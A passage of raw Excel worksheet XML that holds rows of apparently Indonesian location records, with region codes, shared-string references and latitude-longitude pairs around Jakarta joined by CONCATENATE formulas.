        <v>3671021</v>
      </c>
      <c r="O1072">
        <v>3671</v>
      </c>
      <c r="P1072">
        <v>36</v>
      </c>
      <c r="Q1072" t="s">
        <v>454</v>
      </c>
      <c r="R1072" t="s">
        <v>454</v>
      </c>
      <c r="S1072" t="s">
        <v>201</v>
      </c>
      <c r="T1072" t="s">
        <v>171</v>
      </c>
      <c r="U1072" s="5">
        <v>10669340</v>
      </c>
      <c r="V1072" s="5" t="s">
        <v>15447</v>
      </c>
      <c r="W1072" s="5">
        <v>-621697</v>
      </c>
      <c r="X1072" t="s">
        <v>19235</v>
      </c>
      <c r="Y1072" t="str">
        <f t="shared" si="16"/>
        <v>-6.21697,106.69340</v>
      </c>
    </row>
    <row r="1073" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1073">
        <v>108644</v>
      </c>
      <c r="B1073" s="1">
        <v>43885</v>
      </c>
      <c r="C1073">
        <v>1</v>
      </c>
      <c r="D1073" t="s">
        <v>22</v>
      </c>
      <c r="E1073" t="s">
        <v>23</v>
      </c>
      <c r="F1073" t="s">
        <v>4045</v>
      </c>
      <c r="G1073" t="s">
        <v>4046</v>
      </c>
      <c r="H1073" t="s">
        <v>26</v>
      </c>
      <c r="I1073" t="s">
        <v>3668</v>
      </c>
      <c r="J1073" t="s">
        <v>2912</v>
      </c>
      <c r="L1073" t="s">
        <v>4047</v>
      </c>
      <c r="M1073">
        <v>3172040001</v>
      </c>
      <c r="N1073">
        <v>3172040</v>
      </c>
      <c r="O1073">
        <v>3172</v>
      </c>
      <c r="P1073">
        <v>31</v>
      </c>
      <c r="Q1073" t="s">
        <v>2914</v>
      </c>
      <c r="R1073" t="s">
        <v>281</v>
      </c>
      <c r="S1073" t="s">
        <v>49</v>
      </c>
      <c r="T1073" t="s">
        <v>33</v>
      </c>
      <c r="U1073" s="5">
        <v>10688885</v>
      </c>
      <c r="V1073" s="5" t="s">
        <v>15448</v>
      </c>
      <c r="W1073" s="5">
        <v>-629488</v>
      </c>
      <c r="X1073" t="s">
        <v>19236</v>
      </c>
      <c r="Y1073" t="str">
        <f t="shared" si="16"/>
        <v>-6.29488,106.88885</v>
      </c>
    </row>
    <row r="1074" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1074">
        <v>108645</v>
      </c>
      <c r="B1074" s="1">
        <v>43885</v>
      </c>
      <c r="C1074">
        <v>1</v>
      </c>
      <c r="D1074" t="s">
        <v>22</v>
      </c>
      <c r="E1074" t="s">
        <v>23</v>
      </c>
      <c r="F1074" t="s">
        <v>4048</v>
      </c>
      <c r="G1074" t="s">
        <v>4049</v>
      </c>
      <c r="H1074" t="s">
        <v>26</v>
      </c>
      <c r="I1074" t="s">
        <v>1683</v>
      </c>
      <c r="J1074" t="s">
        <v>3135</v>
      </c>
      <c r="L1074" t="s">
        <v>4050</v>
      </c>
      <c r="M1074">
        <v>3671010015</v>
      </c>
      <c r="N1074">
        <v>3671010</v>
      </c>
      <c r="O1074">
        <v>3671</v>
      </c>
      <c r="P1074">
        <v>36</v>
      </c>
      <c r="Q1074" t="s">
        <v>4051</v>
      </c>
      <c r="R1074" t="s">
        <v>200</v>
      </c>
      <c r="S1074" t="s">
        <v>201</v>
      </c>
      <c r="T1074" t="s">
        <v>171</v>
      </c>
      <c r="U1074" s="5">
        <v>10671003</v>
      </c>
      <c r="V1074" s="5" t="s">
        <v>15449</v>
      </c>
      <c r="W1074" s="5">
        <v>-622556</v>
      </c>
      <c r="X1074" t="s">
        <v>19237</v>
      </c>
      <c r="Y1074" t="str">
        <f t="shared" si="16"/>
        <v>-6.22556,106.71003</v>
      </c>
    </row>
    <row r="1075" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1075">
        <v>108646</v>
      </c>
      <c r="B1075" s="1">
        <v>43885</v>
      </c>
      <c r="C1075">
        <v>1</v>
      </c>
      <c r="D1075" t="s">
        <v>22</v>
      </c>
      <c r="E1075" t="s">
        <v>23</v>
      </c>
      <c r="F1075" t="s">
        <v>4052</v>
      </c>
      <c r="H1075" t="s">
        <v>26</v>
      </c>
      <c r="I1075" t="s">
        <v>1809</v>
      </c>
      <c r="J1075" t="s">
        <v>3135</v>
      </c>
      <c r="L1075" t="s">
        <v>4053</v>
      </c>
      <c r="M1075">
        <v>3674060003</v>
      </c>
      <c r="N1075">
        <v>3674060</v>
      </c>
      <c r="O1075">
        <v>3674</v>
      </c>
      <c r="P1075">
        <v>36</v>
      </c>
      <c r="Q1075" t="s">
        <v>205</v>
      </c>
      <c r="R1075" t="s">
        <v>169</v>
      </c>
      <c r="S1075" t="s">
        <v>170</v>
      </c>
      <c r="T1075" t="s">
        <v>171</v>
      </c>
      <c r="U1075" s="5">
        <v>10670417</v>
      </c>
      <c r="V1075" s="5" t="s">
        <v>15450</v>
      </c>
      <c r="W1075" s="5">
        <v>-626612</v>
      </c>
      <c r="X1075" t="s">
        <v>19238</v>
      </c>
      <c r="Y1075" t="str">
        <f t="shared" si="16"/>
        <v>-6.26612,106.70417</v>
      </c>
    </row>
    <row r="1076" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1076">
        <v>108647</v>
      </c>
      <c r="B1076" s="1">
        <v>43885</v>
      </c>
      <c r="C1076">
        <v>1</v>
      </c>
      <c r="D1076" t="s">
        <v>85</v>
      </c>
      <c r="E1076" t="s">
        <v>23</v>
      </c>
      <c r="F1076" t="s">
        <v>4054</v>
      </c>
      <c r="G1076" t="s">
        <v>4055</v>
      </c>
      <c r="H1076" t="s">
        <v>26</v>
      </c>
      <c r="J1076" t="s">
        <v>2627</v>
      </c>
      <c r="K1076" t="s">
        <v>4056</v>
      </c>
      <c r="L1076" t="s">
        <v>4057</v>
      </c>
      <c r="M1076">
        <v>3275020004</v>
      </c>
      <c r="N1076">
        <v>3275020</v>
      </c>
      <c r="O1076">
        <v>3275</v>
      </c>
      <c r="P1076">
        <v>32</v>
      </c>
      <c r="Q1076" t="s">
        <v>828</v>
      </c>
      <c r="R1076" t="s">
        <v>828</v>
      </c>
      <c r="S1076" t="s">
        <v>41</v>
      </c>
      <c r="T1076" t="s">
        <v>42</v>
      </c>
      <c r="U1076" s="5">
        <v>10695518</v>
      </c>
      <c r="V1076" s="5" t="s">
        <v>15451</v>
      </c>
      <c r="W1076" s="5">
        <v>-630072</v>
      </c>
      <c r="X1076" t="s">
        <v>19239</v>
      </c>
      <c r="Y1076" t="str">
        <f t="shared" si="16"/>
        <v>-6.30072,106.95518</v>
      </c>
    </row>
    <row r="1077" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1077">
        <v>108648</v>
      </c>
      <c r="B1077" s="1">
        <v>43885</v>
      </c>
      <c r="C1077">
        <v>1</v>
      </c>
      <c r="D1077" t="s">
        <v>22</v>
      </c>
      <c r="E1077" t="s">
        <v>23</v>
      </c>
      <c r="F1077" t="s">
        <v>4058</v>
      </c>
      <c r="H1077" t="s">
        <v>26</v>
      </c>
      <c r="I1077" t="s">
        <v>65</v>
      </c>
      <c r="J1077" t="s">
        <v>3135</v>
      </c>
      <c r="L1077" t="s">
        <v>4059</v>
      </c>
      <c r="M1077">
        <v>3671050001</v>
      </c>
      <c r="N1077">
        <v>3671050</v>
      </c>
      <c r="O1077">
        <v>3671</v>
      </c>
      <c r="P1077">
        <v>36</v>
      </c>
      <c r="Q1077" t="s">
        <v>4060</v>
      </c>
      <c r="R1077" t="s">
        <v>4061</v>
      </c>
      <c r="S1077" t="s">
        <v>201</v>
      </c>
      <c r="T1077" t="s">
        <v>171</v>
      </c>
      <c r="U1077" s="5">
        <v>10667136</v>
      </c>
      <c r="V1077" s="5" t="s">
        <v>15452</v>
      </c>
      <c r="W1077" s="5">
        <v>-617608</v>
      </c>
      <c r="X1077" t="s">
        <v>19240</v>
      </c>
      <c r="Y1077" t="str">
        <f t="shared" si="16"/>
        <v>-6.17608,106.67136</v>
      </c>
    </row>
    <row r="1078" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1078">
        <v>108649</v>
      </c>
      <c r="B1078" s="1">
        <v>43885</v>
      </c>
      <c r="C1078">
        <v>1</v>
      </c>
      <c r="D1078" t="s">
        <v>22</v>
      </c>
      <c r="E1078" t="s">
        <v>23</v>
      </c>
      <c r="F1078" t="s">
        <v>4062</v>
      </c>
      <c r="H1078" t="s">
        <v>26</v>
      </c>
      <c r="I1078" t="s">
        <v>27</v>
      </c>
      <c r="J1078" t="s">
        <v>3810</v>
      </c>
      <c r="L1078" t="s">
        <v>4063</v>
      </c>
      <c r="M1078">
        <v>3175050003</v>
      </c>
      <c r="N1078">
        <v>3175050</v>
      </c>
      <c r="O1078">
        <v>3175</v>
      </c>
      <c r="P1078">
        <v>31</v>
      </c>
      <c r="Q1078" t="s">
        <v>1740</v>
      </c>
      <c r="R1078" t="s">
        <v>1013</v>
      </c>
      <c r="S1078" t="s">
        <v>547</v>
      </c>
      <c r="T1078" t="s">
        <v>33</v>
      </c>
      <c r="U1078" s="5">
        <v>10691498</v>
      </c>
      <c r="V1078" s="5" t="s">
        <v>15453</v>
      </c>
      <c r="W1078" s="5">
        <v>-616851</v>
      </c>
      <c r="X1078" t="s">
        <v>19241</v>
      </c>
      <c r="Y1078" t="str">
        <f t="shared" si="16"/>
        <v>-6.16851,106.91498</v>
      </c>
    </row>
    <row r="1079" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1079">
        <v>108650</v>
      </c>
      <c r="B1079" s="1">
        <v>43885</v>
      </c>
      <c r="C1079">
        <v>1</v>
      </c>
      <c r="D1079" t="s">
        <v>22</v>
      </c>
      <c r="E1079" t="s">
        <v>23</v>
      </c>
      <c r="F1079" t="s">
        <v>4064</v>
      </c>
      <c r="G1079" t="s">
        <v>4065</v>
      </c>
      <c r="H1079" t="s">
        <v>26</v>
      </c>
      <c r="I1079" t="s">
        <v>2165</v>
      </c>
      <c r="J1079" t="s">
        <v>2627</v>
      </c>
      <c r="L1079" t="s">
        <v>4066</v>
      </c>
      <c r="M1079">
        <v>3275040007</v>
      </c>
      <c r="N1079">
        <v>3275040</v>
      </c>
      <c r="O1079">
        <v>3275</v>
      </c>
      <c r="P1079">
        <v>32</v>
      </c>
      <c r="Q1079" t="s">
        <v>99</v>
      </c>
      <c r="R1079" t="s">
        <v>100</v>
      </c>
      <c r="S1079" t="s">
        <v>41</v>
      </c>
      <c r="T1079" t="s">
        <v>42</v>
      </c>
      <c r="U1079" s="5">
        <v>10702059</v>
      </c>
      <c r="V1079" s="5" t="s">
        <v>15454</v>
      </c>
      <c r="W1079" s="5">
        <v>-623338</v>
      </c>
      <c r="X1079" t="s">
        <v>19242</v>
      </c>
      <c r="Y1079" t="str">
        <f t="shared" si="16"/>
        <v>-6.23338,107.02059</v>
      </c>
    </row>
    <row r="1080" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1080">
        <v>108651</v>
      </c>
      <c r="B1080" s="1">
        <v>43885</v>
      </c>
      <c r="C1080">
        <v>1</v>
      </c>
      <c r="D1080" t="s">
        <v>22</v>
      </c>
      <c r="E1080" t="s">
        <v>23</v>
      </c>
      <c r="F1080" t="s">
        <v>4067</v>
      </c>
      <c r="G1080" t="s">
        <v>4068</v>
      </c>
      <c r="H1080" t="s">
        <v>26</v>
      </c>
      <c r="I1080" t="s">
        <v>974</v>
      </c>
      <c r="J1080" t="s">
        <v>3184</v>
      </c>
      <c r="L1080" t="s">
        <v>4069</v>
      </c>
      <c r="M1080">
        <v>3172070007</v>
      </c>
      <c r="N1080">
        <v>3172070</v>
      </c>
      <c r="O1080">
        <v>3172</v>
      </c>
      <c r="P1080">
        <v>31</v>
      </c>
      <c r="Q1080" t="s">
        <v>3186</v>
      </c>
      <c r="R1080" t="s">
        <v>128</v>
      </c>
      <c r="S1080" t="s">
        <v>49</v>
      </c>
      <c r="T1080" t="s">
        <v>33</v>
      </c>
      <c r="U1080" s="5">
        <v>10690306</v>
      </c>
      <c r="V1080" s="5" t="s">
        <v>15455</v>
      </c>
      <c r="W1080" s="5">
        <v>-621820</v>
      </c>
      <c r="X1080" t="s">
        <v>19243</v>
      </c>
      <c r="Y1080" t="str">
        <f t="shared" si="16"/>
        <v>-6.21820,106.90306</v>
      </c>
    </row>
    <row r="1081" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1081">
        <v>108652</v>
      </c>
      <c r="B1081" s="1">
        <v>43885</v>
      </c>
      <c r="C1081">
        <v>1</v>
      </c>
      <c r="D1081" t="s">
        <v>22</v>
      </c>
      <c r="E1081" t="s">
        <v>23</v>
      </c>
      <c r="F1081" t="s">
        <v>4070</v>
      </c>
      <c r="G1081" t="s">
        <v>4071</v>
      </c>
      <c r="H1081" t="s">
        <v>26</v>
      </c>
      <c r="I1081" t="s">
        <v>2165</v>
      </c>
      <c r="J1081" t="s">
        <v>4072</v>
      </c>
      <c r="M1081">
        <v>3172090007</v>
      </c>
      <c r="N1081">
        <v>3172090</v>
      </c>
      <c r="O1081">
        <v>3172</v>
      </c>
      <c r="P1081">
        <v>31</v>
      </c>
      <c r="Q1081" t="s">
        <v>890</v>
      </c>
      <c r="R1081" t="s">
        <v>890</v>
      </c>
      <c r="S1081" t="s">
        <v>49</v>
      </c>
      <c r="T1081" t="s">
        <v>33</v>
      </c>
      <c r="U1081" s="5">
        <v>10689920</v>
      </c>
      <c r="V1081" s="5" t="s">
        <v>15456</v>
      </c>
      <c r="W1081" s="5">
        <v>-618457</v>
      </c>
      <c r="X1081" t="s">
        <v>19244</v>
      </c>
      <c r="Y1081" t="str">
        <f t="shared" si="16"/>
        <v>-6.18457,106.89920</v>
      </c>
    </row>
    <row r="1082" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1082">
        <v>108653</v>
      </c>
      <c r="B1082" s="1">
        <v>43885</v>
      </c>
      <c r="C1082">
        <v>1</v>
      </c>
      <c r="D1082" t="s">
        <v>22</v>
      </c>
      <c r="E1082" t="s">
        <v>23</v>
      </c>
      <c r="F1082" t="s">
        <v>4073</v>
      </c>
      <c r="H1082" t="s">
        <v>26</v>
      </c>
      <c r="I1082" t="s">
        <v>1359</v>
      </c>
      <c r="J1082" t="s">
        <v>2627</v>
      </c>
      <c r="L1082" t="s">
        <v>250</v>
      </c>
      <c r="M1082">
        <v>3275010010</v>
      </c>
      <c r="N1082">
        <v>3275010</v>
      </c>
      <c r="O1082">
        <v>3275</v>
      </c>
      <c r="P1082">
        <v>32</v>
      </c>
      <c r="Q1082" t="s">
        <v>286</v>
      </c>
      <c r="R1082" t="s">
        <v>287</v>
      </c>
      <c r="S1082" t="s">
        <v>41</v>
      </c>
      <c r="T1082" t="s">
        <v>42</v>
      </c>
      <c r="U1082" s="5">
        <v>10694800</v>
      </c>
      <c r="V1082" s="5" t="s">
        <v>15457</v>
      </c>
      <c r="W1082" s="5">
        <v>-626687</v>
      </c>
      <c r="X1082" t="s">
        <v>19245</v>
      </c>
      <c r="Y1082" t="str">
        <f t="shared" si="16"/>
        <v>-6.26687,106.94800</v>
      </c>
    </row>
    <row r="1083" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1083">
        <v>108654</v>
      </c>
      <c r="B1083" s="1">
        <v>43885</v>
      </c>
      <c r="C1083">
        <v>1</v>
      </c>
      <c r="D1083" t="s">
        <v>22</v>
      </c>
      <c r="E1083" t="s">
        <v>23</v>
      </c>
      <c r="F1083" t="s">
        <v>4074</v>
      </c>
      <c r="G1083" t="s">
        <v>4075</v>
      </c>
      <c r="H1083" t="s">
        <v>26</v>
      </c>
      <c r="I1083" t="s">
        <v>628</v>
      </c>
      <c r="J1083" t="s">
        <v>2305</v>
      </c>
      <c r="L1083" t="s">
        <v>4076</v>
      </c>
      <c r="M1083">
        <v>3172080007</v>
      </c>
      <c r="N1083">
        <v>3172080</v>
      </c>
      <c r="O1083">
        <v>3172</v>
      </c>
      <c r="P1083">
        <v>31</v>
      </c>
      <c r="Q1083" t="s">
        <v>2307</v>
      </c>
      <c r="R1083" t="s">
        <v>141</v>
      </c>
      <c r="S1083" t="s">
        <v>49</v>
      </c>
      <c r="T1083" t="s">
        <v>33</v>
      </c>
      <c r="U1083" s="5">
        <v>10692238</v>
      </c>
      <c r="V1083" s="5" t="s">
        <v>15458</v>
      </c>
      <c r="W1083" s="5">
        <v>-618169</v>
      </c>
      <c r="X1083" t="s">
        <v>19034</v>
      </c>
      <c r="Y1083" t="str">
        <f t="shared" si="16"/>
        <v>-6.18169,106.92238</v>
      </c>
    </row>
    <row r="1084" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1084">
        <v>108655</v>
      </c>
      <c r="B1084" s="1">
        <v>43885</v>
      </c>
      <c r="C1084">
        <v>1</v>
      </c>
      <c r="D1084" t="s">
        <v>22</v>
      </c>
      <c r="E1084" t="s">
        <v>23</v>
      </c>
      <c r="F1084" t="s">
        <v>4077</v>
      </c>
      <c r="G1084" t="s">
        <v>4078</v>
      </c>
      <c r="H1084" t="s">
        <v>26</v>
      </c>
      <c r="I1084" t="s">
        <v>979</v>
      </c>
      <c r="J1084" t="s">
        <v>3135</v>
      </c>
      <c r="L1084" t="s">
        <v>4079</v>
      </c>
      <c r="M1084">
        <v>3671010003</v>
      </c>
      <c r="N1084">
        <v>3671010</v>
      </c>
      <c r="O1084">
        <v>3671</v>
      </c>
      <c r="P1084">
        <v>36</v>
      </c>
      <c r="Q1084" t="s">
        <v>400</v>
      </c>
      <c r="R1084" t="s">
        <v>200</v>
      </c>
      <c r="S1084" t="s">
        <v>201</v>
      </c>
      <c r="T1084" t="s">
        <v>171</v>
      </c>
      <c r="U1084" s="5">
        <v>10670907</v>
      </c>
      <c r="V1084" s="5" t="s">
        <v>15459</v>
      </c>
      <c r="W1084" s="5">
        <v>-624876</v>
      </c>
      <c r="X1084" t="s">
        <v>19246</v>
      </c>
      <c r="Y1084" t="str">
        <f t="shared" si="16"/>
        <v>-6.24876,106.70907</v>
      </c>
    </row>
    <row r="1085" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1085">
        <v>108656</v>
      </c>
      <c r="B1085" s="1">
        <v>43885</v>
      </c>
      <c r="C1085">
        <v>1</v>
      </c>
      <c r="D1085" t="s">
        <v>22</v>
      </c>
      <c r="E1085" t="s">
        <v>23</v>
      </c>
      <c r="F1085" t="s">
        <v>4080</v>
      </c>
      <c r="G1085" t="s">
        <v>4081</v>
      </c>
      <c r="H1085" t="s">
        <v>26</v>
      </c>
      <c r="I1085" t="s">
        <v>974</v>
      </c>
      <c r="J1085" t="s">
        <v>2627</v>
      </c>
      <c r="M1085">
        <v>3275010010</v>
      </c>
      <c r="N1085">
        <v>3275010</v>
      </c>
      <c r="O1085">
        <v>3275</v>
      </c>
      <c r="P1085">
        <v>32</v>
      </c>
      <c r="Q1085" t="s">
        <v>286</v>
      </c>
      <c r="R1085" t="s">
        <v>287</v>
      </c>
      <c r="S1085" t="s">
        <v>41</v>
      </c>
      <c r="T1085" t="s">
        <v>42</v>
      </c>
      <c r="U1085" s="5">
        <v>10694798</v>
      </c>
      <c r="V1085" s="5" t="s">
        <v>15460</v>
      </c>
      <c r="W1085" s="5">
        <v>-626687</v>
      </c>
      <c r="X1085" t="s">
        <v>19245</v>
      </c>
      <c r="Y1085" t="str">
        <f t="shared" si="16"/>
        <v>-6.26687,106.94798</v>
      </c>
    </row>
    <row r="1086" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1086">
        <v>108657</v>
      </c>
      <c r="B1086" s="1">
        <v>43885</v>
      </c>
      <c r="C1086">
        <v>1</v>
      </c>
      <c r="D1086" t="s">
        <v>22</v>
      </c>
      <c r="E1086" t="s">
        <v>23</v>
      </c>
      <c r="F1086" t="s">
        <v>4082</v>
      </c>
      <c r="G1086" t="s">
        <v>4083</v>
      </c>
      <c r="H1086" t="s">
        <v>26</v>
      </c>
      <c r="I1086" t="s">
        <v>2562</v>
      </c>
      <c r="J1086" t="s">
        <v>2627</v>
      </c>
      <c r="L1086" t="s">
        <v>4084</v>
      </c>
      <c r="M1086">
        <v>3275010009</v>
      </c>
      <c r="N1086">
        <v>3275010</v>
      </c>
      <c r="O1086">
        <v>3275</v>
      </c>
      <c r="P1086">
        <v>32</v>
      </c>
      <c r="Q1086" t="s">
        <v>2444</v>
      </c>
      <c r="R1086" t="s">
        <v>287</v>
      </c>
      <c r="S1086" t="s">
        <v>41</v>
      </c>
      <c r="T1086" t="s">
        <v>42</v>
      </c>
      <c r="U1086" s="5">
        <v>10692591</v>
      </c>
      <c r="V1086" s="5" t="s">
        <v>15461</v>
      </c>
      <c r="W1086" s="5">
        <v>-627135</v>
      </c>
      <c r="X1086" t="s">
        <v>19247</v>
      </c>
      <c r="Y1086" t="str">
        <f t="shared" si="16"/>
        <v>-6.27135,106.92591</v>
      </c>
    </row>
    <row r="1087" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1087">
        <v>108658</v>
      </c>
      <c r="B1087" s="1">
        <v>43885</v>
      </c>
      <c r="C1087">
        <v>1</v>
      </c>
      <c r="D1087" t="s">
        <v>22</v>
      </c>
      <c r="E1087" t="s">
        <v>23</v>
      </c>
      <c r="F1087" t="s">
        <v>4085</v>
      </c>
      <c r="G1087" t="s">
        <v>4086</v>
      </c>
      <c r="H1087" t="s">
        <v>26</v>
      </c>
      <c r="I1087" t="s">
        <v>2293</v>
      </c>
      <c r="J1087" t="s">
        <v>2627</v>
      </c>
      <c r="L1087" t="s">
        <v>4087</v>
      </c>
      <c r="M1087">
        <v>3275012001</v>
      </c>
      <c r="N1087">
        <v>3275012</v>
      </c>
      <c r="O1087">
        <v>3275</v>
      </c>
      <c r="P1087">
        <v>32</v>
      </c>
      <c r="Q1087" t="s">
        <v>4088</v>
      </c>
      <c r="R1087" t="s">
        <v>4089</v>
      </c>
      <c r="S1087" t="s">
        <v>41</v>
      </c>
      <c r="T1087" t="s">
        <v>42</v>
      </c>
      <c r="U1087" s="5">
        <v>10692896</v>
      </c>
      <c r="V1087" s="5" t="s">
        <v>15462</v>
      </c>
      <c r="W1087" s="5">
        <v>-632692</v>
      </c>
      <c r="X1087" t="s">
        <v>19248</v>
      </c>
      <c r="Y1087" t="str">
        <f t="shared" si="16"/>
        <v>-6.32692,106.92896</v>
      </c>
    </row>
    <row r="1088" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1088">
        <v>108659</v>
      </c>
      <c r="B1088" s="1">
        <v>43885</v>
      </c>
      <c r="C1088">
        <v>1</v>
      </c>
      <c r="D1088" t="s">
        <v>22</v>
      </c>
      <c r="E1088" t="s">
        <v>23</v>
      </c>
      <c r="F1088" t="s">
        <v>4090</v>
      </c>
      <c r="G1088" t="s">
        <v>4091</v>
      </c>
      <c r="H1088" t="s">
        <v>26</v>
      </c>
      <c r="I1088" t="s">
        <v>457</v>
      </c>
      <c r="J1088" t="s">
        <v>3438</v>
      </c>
      <c r="L1088" t="s">
        <v>4092</v>
      </c>
      <c r="M1088">
        <v>3172090007</v>
      </c>
      <c r="N1088">
        <v>3172090</v>
      </c>
      <c r="O1088">
        <v>3172</v>
      </c>
      <c r="P1088">
        <v>31</v>
      </c>
      <c r="Q1088" t="s">
        <v>890</v>
      </c>
      <c r="R1088" t="s">
        <v>890</v>
      </c>
      <c r="S1088" t="s">
        <v>49</v>
      </c>
      <c r="T1088" t="s">
        <v>33</v>
      </c>
      <c r="U1088" s="5">
        <v>10690034</v>
      </c>
      <c r="V1088" s="5" t="s">
        <v>15463</v>
      </c>
      <c r="W1088" s="5">
        <v>-618109</v>
      </c>
      <c r="X1088" t="s">
        <v>19249</v>
      </c>
      <c r="Y1088" t="str">
        <f t="shared" si="16"/>
        <v>-6.18109,106.90034</v>
      </c>
    </row>
    <row r="1089" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1089">
        <v>108660</v>
      </c>
      <c r="B1089" s="1">
        <v>43885</v>
      </c>
      <c r="C1089">
        <v>1</v>
      </c>
      <c r="D1089" t="s">
        <v>22</v>
      </c>
      <c r="E1089" t="s">
        <v>23</v>
      </c>
      <c r="F1089" t="s">
        <v>4093</v>
      </c>
      <c r="G1089" t="s">
        <v>4094</v>
      </c>
      <c r="H1089" t="s">
        <v>26</v>
      </c>
      <c r="I1089" t="s">
        <v>3652</v>
      </c>
      <c r="J1089" t="s">
        <v>2871</v>
      </c>
      <c r="L1089" t="s">
        <v>4095</v>
      </c>
      <c r="M1089">
        <v>3172080003</v>
      </c>
      <c r="N1089">
        <v>3172080</v>
      </c>
      <c r="O1089">
        <v>3172</v>
      </c>
      <c r="P1089">
        <v>31</v>
      </c>
      <c r="Q1089" t="s">
        <v>2250</v>
      </c>
      <c r="R1089" t="s">
        <v>141</v>
      </c>
      <c r="S1089" t="s">
        <v>49</v>
      </c>
      <c r="T1089" t="s">
        <v>33</v>
      </c>
      <c r="U1089" s="5">
        <v>10695777</v>
      </c>
      <c r="V1089" s="5" t="s">
        <v>15464</v>
      </c>
      <c r="W1089" s="5">
        <v>-620223</v>
      </c>
      <c r="X1089" t="s">
        <v>19250</v>
      </c>
      <c r="Y1089" t="str">
        <f t="shared" si="16"/>
        <v>-6.20223,106.95777</v>
      </c>
    </row>
    <row r="1090" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1090">
        <v>108661</v>
      </c>
      <c r="B1090" s="1">
        <v>43885</v>
      </c>
      <c r="C1090">
        <v>1</v>
      </c>
      <c r="D1090" t="s">
        <v>22</v>
      </c>
      <c r="E1090" t="s">
        <v>23</v>
      </c>
      <c r="F1090" t="s">
        <v>4096</v>
      </c>
      <c r="H1090" t="s">
        <v>26</v>
      </c>
      <c r="I1090" t="s">
        <v>592</v>
      </c>
      <c r="J1090" t="s">
        <v>3438</v>
      </c>
      <c r="L1090" t="s">
        <v>4097</v>
      </c>
      <c r="M1090">
        <v>3172090007</v>
      </c>
      <c r="N1090">
        <v>3172090</v>
      </c>
      <c r="O1090">
        <v>3172</v>
      </c>
      <c r="P1090">
        <v>31</v>
      </c>
      <c r="Q1090" t="s">
        <v>890</v>
      </c>
      <c r="R1090" t="s">
        <v>890</v>
      </c>
      <c r="S1090" t="s">
        <v>49</v>
      </c>
      <c r="T1090" t="s">
        <v>33</v>
      </c>
      <c r="U1090" s="5">
        <v>10690285</v>
      </c>
      <c r="V1090" s="5" t="s">
        <v>15316</v>
      </c>
      <c r="W1090" s="5">
        <v>-618222</v>
      </c>
      <c r="X1090" t="s">
        <v>19251</v>
      </c>
      <c r="Y1090" t="str">
        <f t="shared" si="16"/>
        <v>-6.18222,106.90285</v>
      </c>
    </row>
    <row r="1091" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1091">
        <v>108662</v>
      </c>
      <c r="B1091" s="1">
        <v>43885</v>
      </c>
      <c r="C1091">
        <v>1</v>
      </c>
      <c r="D1091" t="s">
        <v>22</v>
      </c>
      <c r="E1091" t="s">
        <v>23</v>
      </c>
      <c r="F1091" t="s">
        <v>4098</v>
      </c>
      <c r="G1091" t="s">
        <v>4099</v>
      </c>
      <c r="H1091" t="s">
        <v>26</v>
      </c>
      <c r="I1091" t="s">
        <v>4100</v>
      </c>
      <c r="J1091" t="s">
        <v>2498</v>
      </c>
      <c r="L1091" t="s">
        <v>4101</v>
      </c>
      <c r="M1091">
        <v>3173010003</v>
      </c>
      <c r="N1091">
        <v>3173010</v>
      </c>
      <c r="O1091">
        <v>3173</v>
      </c>
      <c r="P1091">
        <v>31</v>
      </c>
      <c r="Q1091" t="s">
        <v>2338</v>
      </c>
      <c r="R1091" t="s">
        <v>1481</v>
      </c>
      <c r="S1091" t="s">
        <v>62</v>
      </c>
      <c r="T1091" t="s">
        <v>33</v>
      </c>
      <c r="U1091" s="5">
        <v>10681273</v>
      </c>
      <c r="V1091" s="5" t="s">
        <v>15465</v>
      </c>
      <c r="W1091" s="5">
        <v>-620857</v>
      </c>
      <c r="X1091" t="s">
        <v>19252</v>
      </c>
      <c r="Y1091" t="str">
        <f t="shared" ref="Y1091:Y1154" si="17">CONCATENATE(X1091,",",V1091)</f>
        <v>-6.20857,106.81273</v>
      </c>
    </row>
    <row r="1092" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1092">
        <v>108663</v>
      </c>
      <c r="B1092" s="1">
        <v>43885</v>
      </c>
      <c r="C1092">
        <v>1</v>
      </c>
      <c r="D1092" t="s">
        <v>22</v>
      </c>
      <c r="E1092" t="s">
        <v>23</v>
      </c>
      <c r="F1092" t="s">
        <v>4102</v>
      </c>
      <c r="H1092" t="s">
        <v>26</v>
      </c>
      <c r="I1092" t="s">
        <v>1971</v>
      </c>
      <c r="J1092" t="s">
        <v>2627</v>
      </c>
      <c r="L1092" t="s">
        <v>4103</v>
      </c>
      <c r="M1092">
        <v>3275060002</v>
      </c>
      <c r="N1092">
        <v>3275060</v>
      </c>
      <c r="O1092">
        <v>3275</v>
      </c>
      <c r="P1092">
        <v>32</v>
      </c>
      <c r="Q1092" t="s">
        <v>113</v>
      </c>
      <c r="R1092" t="s">
        <v>114</v>
      </c>
      <c r="S1092" t="s">
        <v>41</v>
      </c>
      <c r="T1092" t="s">
        <v>42</v>
      </c>
      <c r="U1092" s="5">
        <v>10695361</v>
      </c>
      <c r="V1092" s="5" t="s">
        <v>15466</v>
      </c>
      <c r="W1092" s="5">
        <v>-623057</v>
      </c>
      <c r="X1092" t="s">
        <v>19253</v>
      </c>
      <c r="Y1092" t="str">
        <f t="shared" si="17"/>
        <v>-6.23057,106.95361</v>
      </c>
    </row>
    <row r="1093" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1093">
        <v>108664</v>
      </c>
      <c r="B1093" s="1">
        <v>43885</v>
      </c>
      <c r="C1093">
        <v>1</v>
      </c>
      <c r="D1093" t="s">
        <v>22</v>
      </c>
      <c r="E1093" t="s">
        <v>23</v>
      </c>
